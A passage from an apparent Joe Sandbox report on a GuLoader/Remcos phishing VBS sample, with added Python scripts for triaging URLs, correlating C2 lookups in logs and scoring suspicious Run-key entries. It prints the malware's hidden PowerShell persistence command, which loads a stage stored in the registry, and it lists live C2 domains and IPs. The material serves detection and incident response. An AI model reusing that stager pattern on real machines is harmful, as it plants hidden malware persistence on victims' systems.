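    confirmed = sorted(uniq & set(contacted))
    maximal = set(collapse_prefixes(uniq)) - set(confirmed)
    candidate = sorted(u for u in maximal if plausible_url(u))
    discarded = sorted(uniq - set(confirmed) - set(candidate))
    return {"confirmed": confirmed, "candidate": candidate, "discarded": discarded}


if __name__ == "__main__":
    for tier, urls in triage_urls(SAMPLE_STRINGS, CONTACTED_URLS).items():
        print(tier)
        for u in urls:
            print("  " + u)
```

A candidate that merely extends a confirmed URL, such as the zPwwF47.binOptjsLan... string, is almost certainly the confirmed URL followed by whatever sat next to it in memory, but the code cannot distinguish that from a real longer path and leaves the call to the analyst; the same applies to the trailing X on the moviesmacktalk.com string.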
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-AS ATOM86, NL | false
192.185.112.252 | contemega.com.do | United States | 46606 | UNIFIEDLAYER-AS-1, US | false
206.123.148.194 | janbours92harbu02.duckdns.org | United States | 9009 | M247, GB | true
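The network tables above give the two traffic features an infected host shows: the dynamic-DNS C2 name (janbours92harbu02.duckdns.org, 206.123.148.194, the only entry flagged malicious) and the geolocation check-in to http://geoplugin.net/json.gp, which the related-sample lists below show for every Remcos analysis. The Python below is an added example, not from the report, that correlates the two in DNS/proxy logs: any host that resolves a *.duckdns.org name and fetches geoplugin.net/json.gp within a ten-minute window of each other, or that connects directly to the listed C2 address, is reported. The log format, the host names, the window and the single dynamic-DNS suffix are assumptions; the log lines are constructed.

```python
"""Correlate dynamic-DNS C2 resolution with the geoplugin.net check-in in host logs."""
from datetime import datetime, timedelta

# Indicators taken from the network tables above.
C2_IPS = {"206.123.148.194"}
DYNDNS_SUFFIXES = (".duckdns.org",)   # assumption: extend with other dynamic-DNS providers
GEO_URL = "http://geoplugin.net/json.gp"

# Constructed log lines: "<utc timestamp> <host> <dns|http|conn> <value>".
SAMPLE_LOG = """\
2024-07-01T14:19:50Z ws-17 dns janbours92harbu02.duckdns.org
2024-07-01T14:19:51Z ws-17 conn 206.123.148.194
2024-07-01T14:19:53Z ws-17 http http://geoplugin.net/json.gp
2024-07-01T14:20:10Z ws-03 http http://geoplugin.net/json.gp
2024-07-01T12:05:00Z ws-09 dns backup.duckdns.org
2024-07-01T14:40:00Z ws-09 http http://geoplugin.net/json.gp
"""


def parse_log(text):
    """Parse the sample format into (timestamp, host, kind, value) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, kind, value = line.split(maxsplit=3)
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, kind, value))
    return events


def correlate(events, window=timedelta(minutes=10)):
    """Return one finding per host/indicator pair.

    A host is reported when it connects to a known C2 address, or when it
    resolves a dynamic-DNS name and fetches the geoplugin check-in within
    `window` of each other (in either order). A geoplugin request on its own
    is not reported: plenty of legitimate software uses the service.
    """
    per_host = {}
    for ts, host, kind, value in events:
        h = per_host.setdefault(host, {"dyn": [], "geo": [], "c2": []})
        v = value.lower()
        if kind == "dns" and v.endswith(DYNDNS_SUFFIXES):
            h["dyn"].append((ts, v))
        elif kind == "http" and v == GEO_URL:
            h["geo"].append(ts)
        elif kind == "conn" and v in C2_IPS:
            h["c2"].append((ts, v))
    findings = []
    for host in sorted(per_host):
        h = per_host[host]
        for ts, ip in h["c2"]:
            findings.append({"host": host, "reason": "known-c2-ip",
                             "indicator": ip, "at": ts.isoformat()})
        for dts, name in h["dyn"]:
            for gts in h["geo"]:
                if abs(gts - dts) <= window:
                    findings.append({"host": host, "reason": "dyndns+geoplugin",
                                     "indicator": name, "at": dts.isoformat()})
    return findings


def flagged_hosts(findings):
    """Distinct hosts named in a findings list, sorted."""
    return sorted({f["host"] for f in findings})


if __name__ == "__main__":
    for f in correlate(parse_log(SAMPLE_LOG)):
        print(f"{f['host']}: {f['reason']} ({f['indicator']} at {f['at']})")
```

On the constructed log only ws-17 is reported: ws-03 fetched geoplugin without a dynamic-DNS lookup, and ws-09's lookup is more than two hours before its check-in, which a wider window would catch at the cost of more noise.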
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465419
Start date and time: 2024-07-01 16:18:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL Shipping Document Awb & BL.vbs
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 176
• Number of non-executed functions: 282
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7792 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: DHL Shipping Document Awb & BL.vbs
Time | Type | Description
--- | --- | ---
10:19:03 | API Interceptor | 125x Sleep call for process: powershell.exe modified
10:20:26 | API Interceptor | 8x Sleep call for process: wab.exe modified
15:19:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gstes %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)
15:19:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gstes %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)
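The two Autostart rows above show how persistence is laid down: a Run value (gstes) whose program is an environment variable expanded at logon rather than a path, a hidden-window switch (-w 1), and a next stage that is read back out of a custom registry key (HKCU:\Fiberstof, value Ufuldkommenheds) and invoked by calling the variable with it. The Python below is an added example, not from the report, that scores Run entries for exactly those traits and, on a Windows host, reads the referenced registry value so the stored stage can be exported for analysis. The gstes data is copied from the rows above; the OneDrive entry is constructed for contrast; the indicator names and the winreg-based enumeration are this example's own.

```python
"""Triage Run-key entries for the registry-stored PowerShell stager pattern above."""
import re

# Constructed sample: the gstes value data from the Autostart rows, plus a
# made-up benign entry so the scoring has something to reject.
SAMPLE_RUN_ENTRIES = {
    "gstes": r"%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)",
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

# Traits of the stager command line; each regex is one indicator.
INDICATORS = [
    # the program to run is an expanded environment variable, not a path
    ("env-var-as-program", re.compile(r"^\s*%[^%]+%")),
    # powershell.exe -w 1 / -WindowStyle Hidden
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b", re.I)),
    # the next stage is read from a registry value instead of a file
    ("registry-stored-payload", re.compile(r"Get-ItemProperty\s+-Path\s+'HK(?:CU|LM):\\", re.I)),
    # the fetched string is executed by calling the variable with it: %var% ($x)
    ("variable-invocation", re.compile(r"%[^%]+%\s*\(\$\w+\)")),
]

# Pulls (hive, subkey, value name) out of  (Get-ItemProperty -Path 'HKCU:\Sub\').Value
PAYLOAD_REF = re.compile(
    r"Get-ItemProperty\s+-Path\s+'(HKCU|HKLM):\\([^']*?)\\?'\s*\)\.(\w+)", re.I)


def score_run_entry(data):
    """Return the names of the indicators that match one Run value's command line."""
    return [name for name, rx in INDICATORS if rx.search(data)]


def extract_payload_ref(data):
    """Return (hive, subkey, value) for the registry value the command reads, or None."""
    m = PAYLOAD_REF.search(data)
    return (m.group(1).upper(), m.group(2), m.group(3)) if m else None


def triage(entries, min_hits=2):
    """Return {entry: indicators} for entries matching at least min_hits indicators."""
    found = {}
    for name, data in entries.items():
        hits = score_run_entry(data)
        if len(hits) >= min_hits:
            found[name] = hits
    return found


def enumerate_run_entries():
    """Read HKCU/HKLM Run keys via winreg; returns {} where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return {}
    entries = {}
    hives = ((winreg.HKEY_CURRENT_USER, "HKCU"), (winreg.HKEY_LOCAL_MACHINE, "HKLM"))
    subkeys = (r"Software\Microsoft\Windows\CurrentVersion\Run",
               r"Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run")
    for hive, hive_name in hives:
        for sub in subkeys:
            try:
                key = winreg.OpenKey(hive, sub)
            except OSError:
                continue
            with key:
                i = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, i)
                    except OSError:        # no more values
                        break
                    entries[f"{hive_name}\\{sub}\\{name}"] = str(data)
                    i += 1
    return entries


def read_registry_payload(ref):
    """Fetch the stored stage named by extract_payload_ref(); None off Windows or if absent."""
    try:
        import winreg
    except ImportError:
        return None
    hive = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}[ref[0]]
    try:
        with winreg.OpenKey(hive, ref[1]) as key:
            data, _ = winreg.QueryValueEx(key, ref[2])
            return data
    except OSError:
        return None


if __name__ == "__main__":
    entries = enumerate_run_entries() or SAMPLE_RUN_ENTRIES   # live host, else the sample
    for name, hits in triage(entries).items():
        print(f"{name}: {', '.join(hits)}")
        ref = extract_payload_ref(entries[name])
        if ref is None:
            continue
        payload = read_registry_payload(ref)
        where = f"{ref[0]}:\\{ref[1]}\\{ref[2]}"
        if payload is None:
            print(f"  stage stored at {where}: not readable on this host")
        else:
            print(f"  stage stored at {where}: {len(payload)} chars, export before cleanup")
```

Run it on the infected host before removing the Run value: the stage in HKCU:\Fiberstof is the thing worth keeping, since deleting the persistence entry first leaves the payload behind with nothing pointing at it.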
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
178.237.33.50 | tWitaq427K.exe | malicious | Remcos, AgentTesla | geoplugin.net/json.gp
178.237.33.50 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Offer ZI-0428.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | cKiTq7RRCn.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Quotation.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
192.185.112.252 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos |
192.185.112.252 | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader |
206.123.148.194 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos |
206.123.148.194 | Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos |
206.123.148.194 | DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbs | malicious | GuLoader, Remcos |
206.123.148.194 | Deutschepost Invoice & Awb0000000.vbs | malicious | GuLoader, Remcos |
206.123.148.194 | DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbs | malicious | GuLoader, Remcos |
206.123.148.194 | MaerskPreawbsamedaydelivery636489384759390200.vbs | malicious | GuLoader, Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
janbours92harbu02.duckdns.org | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 206.123.148.194
janbours92harbu02.duckdns.org | Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | 206.123.148.194
janbours92harbu02.duckdns.org | DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbs | malicious | GuLoader, Remcos | 206.123.148.194
janbours92harbu02.duckdns.org | Deutschepost Invoice & Awb0000000.vbs | malicious | GuLoader, Remcos | 206.123.148.194
janbours92harbu02.duckdns.org | Transaction_Execution_Confirmation_000000.vbs | malicious | GuLoader, Remcos | 206.123.148.196
janbours92harbu02.duckdns.org | DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbs | malicious | GuLoader, Remcos | 206.123.148.194
janbours92harbu02.duckdns.org | MaerskPreawbsamedaydelivery636489384759390200.vbs | malicious | GuLoader, Remcos | 206.123.148.194
janbours92harbu02.duckdns.org | DHL_Shipping_Invoice_Awb_0000000.vbs | malicious | GuLoader, Remcos | 194.55.186.124
contemega.com.do | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 192.185.112.252
contemega.com.do | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader | 192.185.112.252
geoplugin.net | tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
geoplugin.net | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Offer ZI-0428.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | Quotation.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNIFIEDLAYER-AS-1US | yVtOz1fD5G.exe | malicious | AgentTesla | 162.241.62.63
 | F46VBJ6Yvy.exe | malicious | AgentTesla | 192.254.225.136
 | 8w5wHh755H.exe | malicious | AgentTesla | 192.185.143.105
 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 192.185.112.252
 | MV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exe | malicious | AgentTesla | 50.87.144.157
 | h8N9qpyRAPaiitu.exe | malicious | FormBook | 50.87.148.119
 | Att0027592.exe | malicious | FormBook | 162.240.81.18
 | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | 192.185.217.247
 | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader | 192.185.112.252
 | invoice__ pdf.wsf | malicious | GuLoader | 192.185.76.254
ATOM86-ASATOM86NL | tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
 | Offer ZI-0428.doc | malicious | Remcos | 178.237.33.50
 | cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
 | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
 | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
 | Quotation.xls | malicious | Remcos | 178.237.33.50
 | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | 178.237.33.50
 | Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | 178.237.33.50
 | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 178.237.33.50
M247GB | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 206.123.148.194
 | invoice-72717953897646054572255005658360083176291774189023-quiltercheviot.pdf | malicious | HTMLPhisher | 38.132.122.254
 | Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | 206.123.148.194
 | BviOG97ArX.elf | malicious | Mirai, Moobot | 173.211.86.129
 | DCwYFBy6z7.elf | malicious | Mirai, Moobot | 38.204.196.215
 | DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbs | malicious | GuLoader, Remcos | 206.123.148.194
 | Deutschepost Invoice & Awb0000000.vbs | malicious | GuLoader, Remcos | 206.123.148.194
 | 8eBzSB5cmamfLKJ.exe | malicious | FormBook | 38.207.19.49
 | https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA0MzgwJnMyPTY0MzU5MTI4JnMzPUdMQg== | malicious | Phisher | 195.133.83.209
 | https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg== | malicious | Phisher | 195.133.83.209
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | F46VBJ6Yvy.exe | malicious | AgentTesla | 192.185.112.252
 | 8w5wHh755H.exe | malicious | AgentTesla | 192.185.112.252
 | gB49zgUhr8.exe | malicious | AgentTesla | 192.185.112.252
 | AdhP1WMUi5.exe | malicious | AgentTesla | 192.185.112.252
 | http://trk-synovetra.com | malicious | Unknown | 192.185.112.252
 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 192.185.112.252
 | Ph58Rkdxor.exe | malicious | XWorm | 192.185.112.252
 | 4kvADqDmZ4.exe | malicious | PureLog Stealer, XWorm | 192.185.112.252
 | doc -scan file.exe | malicious | AgentTesla | 192.185.112.252
 | Drawing specification and June PO #07329.exe | malicious | AgentTesla, DarkTortilla | 192.185.112.252
37f463bf4616ecd445d4a1937da06e19 | capisp.dll.dll | malicious | Bazar Loader, BruteRatel, Latrodectus | 192.185.112.252
 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 192.185.112.252
 | doc20240625-00073.bat.exe | malicious | AgentTesla, GuLoader | 192.185.112.252
 | SeAH RFP_24-0676#U00b7pdf.exe | malicious | GuLoader, Lokibot | 192.185.112.252
 | 20240506_120821.xls | malicious | Unknown | 192.185.112.252
 | New Order CHAL-0435.vbs | malicious | AgentTesla, GuLoader | 192.185.112.252
 | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | 192.185.112.252
 | zyJWi2vy29.exe | malicious | LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT | 192.185.112.252
 | 56bDgH9sMQ.exe | malicious | Vidar | 192.185.112.252
 | vjYcExA6ou.exe | malicious | PureLog Stealer, Vidar | 192.185.112.252
                                        No context
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.013811273052389
                                        Encrypted:false
                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                        Malicious:false
                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.8908305915084105
                                        Encrypted:false
                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                        Malicious:false
                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllulbnolz:NllUc
                                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x93162959, page size 32768, DirtyShutdown, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):16252928
                                        Entropy (8bit):0.9745410493381076
                                        Encrypted:false
                                        SSDEEP:6144:ooTzWYo1CKGP5q/XiE9ENP//Xsx0BnNP//Xsx0Bn695nk8eX8e58ekpj98ev8ef5:Vh+DFrVe90FZEhVKsKaNR9
                                        MD5:75E89EFC73D96AADD28DE34D3835EBE8
                                        SHA1:3795F9B5071AF7C56911E3C123B5F97215A6F363
                                        SHA-256:F507DA6A39332803AF242E5CF3455B3A22A516C430D0FF1906F19128EFAEE3F0
                                        SHA-512:CF7575A508871C6E9F35845A525D6B651087D78A559708CAE62389C6CAF75BA42690C04EDF9F27E0F6311CDA1459AAC3D879DA45E6495C2C066B49B754257B72
                                        Malicious:false
                                        Preview:..)Y... .......4........X.2';...{k.......................k..........{.......|..h.m............................';...{-.............................................................................................S...........eJ......n........................................................................................................... ............{E..................................................................................................................................................................................................{E....................................Z6....|....................`.....|...........................#......h.m.....................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):346
                                        Entropy (8bit):3.452804879023423
                                        Encrypted:false
                                        SSDEEP:6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgUubdlrYSWn+SkgI9lAn9YKJRB4y0a8:xQ4lA2++ugypjBQMB3DubdpYS5s4lG9W
                                        MD5:66442CCD48F759B031F9B823384E55BC
                                        SHA1:B23D081BDC9686E199BCD24AECCD77CCF4550DC6
                                        SHA-256:8705236D12F3890C431EEF683356787B711351E8B302A2CC1FD333ECD8198355
                                        SHA-512:5FDB17E0E5F520BCAAAB6A160655D608F8E5CEFE49C6AA221B808D256294AE565E05F3F097C875ED716E8424C4C180418D7216014846D54A44948961169DF245
                                        Malicious:true
